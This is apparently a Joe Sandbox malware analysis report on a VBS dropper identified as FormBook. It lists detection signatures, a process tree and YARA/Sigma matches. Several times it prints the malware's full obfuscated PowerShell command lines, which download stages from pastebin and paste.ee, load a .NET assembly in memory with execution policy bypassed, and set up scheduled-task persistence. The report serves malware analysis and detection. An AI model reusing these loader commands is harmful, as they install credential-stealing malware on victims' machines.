Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PURCHASE OKK.vbs

Overview

General Information

Sample name:PURCHASE OKK.vbs
Analysis ID:1665559
MD5:38258b62eac1814f6e038be7bb84dafe
SHA1:aea92f71513715ead9096bfabc2656fbddc10b2a
SHA256:abba2995a8e1364f0e3a23e247483d79830d7d8558356877a9960c4ce62e9bbd
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Paste sharing url in reverse order
Suricata IDS alerts for network traffic
Yara detected FormBook
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential dropper URLs found in powershell memory
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7588 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • schtasks.exe (PID: 7664 cmdline: "C:\Windows\System32\schtasks.exe" /delete /tn task name /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7720 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?Jw?s?C??Jw?n?D??Jw?n?Cw?I??n?Cc?MQ?n?Cc?L??g?Cc?JwBS?G8?Z?Bh?Cc?Jw?g?C??KQ?g?Ck?I??7?Cc?I??7?CQ?VgBC?Fc?VwB6?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??z?C4?c?Bz?DE?Jw?g?Ck?I??7?CQ?TQBP?EQ?UgBn?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BW?EI?VwBX?Ho?I??g?C0?ZgBv?HI?YwBl?C??OwBw?G8?dwBl?HI?cwBo?GU?b?Bs?C??LQBF?Hg?ZQBj?HU?d?Bp?G8?bgBQ?G8?b?Bp?GM?eQ?g?EI?eQBw?GE?cwBz?C??LQBG?Gk?b?Bl?C??J?BW?EI?VwBX?Ho?I??7??==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\PURCHASE OKK.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 8040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • MSBuild.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • DmMVOWsP1JSI77P.exe (PID: 2252 cmdline: "C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\ElCKIdTD.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • iexpress.exe (PID: 1420 cmdline: "C:\Windows\SysWOW64\iexpress.exe" MD5: D594B2A33EFAFD0EABF09E3FDC05FCEA)
                • DmMVOWsP1JSI77P.exe (PID: 3748 cmdline: "C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\v7rWi9QIDxHSX.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
                • firefox.exe (PID: 5468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 5200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              10.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                8.2.powershell.exe.15d903ef8d0.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  8.2.powershell.exe.15d903ef8d0.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URLDetects executables (downloaders) containing reversed URLs to raw contents of a pasteditekSHen
                  • 0xc1399:$u1: /moc.nibetsap//:sptth
                  • 0xc3bac:$u1: /moc.nibetsap//:sptth
                  8.2.powershell.exe.15d903ef8d0.0.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
                  • 0xc13a6:$h2: //:sptth
                  • 0xc3bc6:$h2: //:sptth
                  • 0xc13d0:$s1: DownloadString
                  • 0xc3c8c:$s1: DownloadString
                  • 0xd277c:$s1: DownloadString
                  • 0xc13c5:$s2: StrReverse
                  • 0xc3c5c:$s2: StrReverse
                  • 0xc1437:$s3: FromBase64String
                  • 0xc3e2c:$s3: FromBase64String
                  • 0xd6fc:$s4: WebClient

                  Sigma Signatures

                  Networking

                  barindex
                  Sigma detected: Paste sharing url in reverse order
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 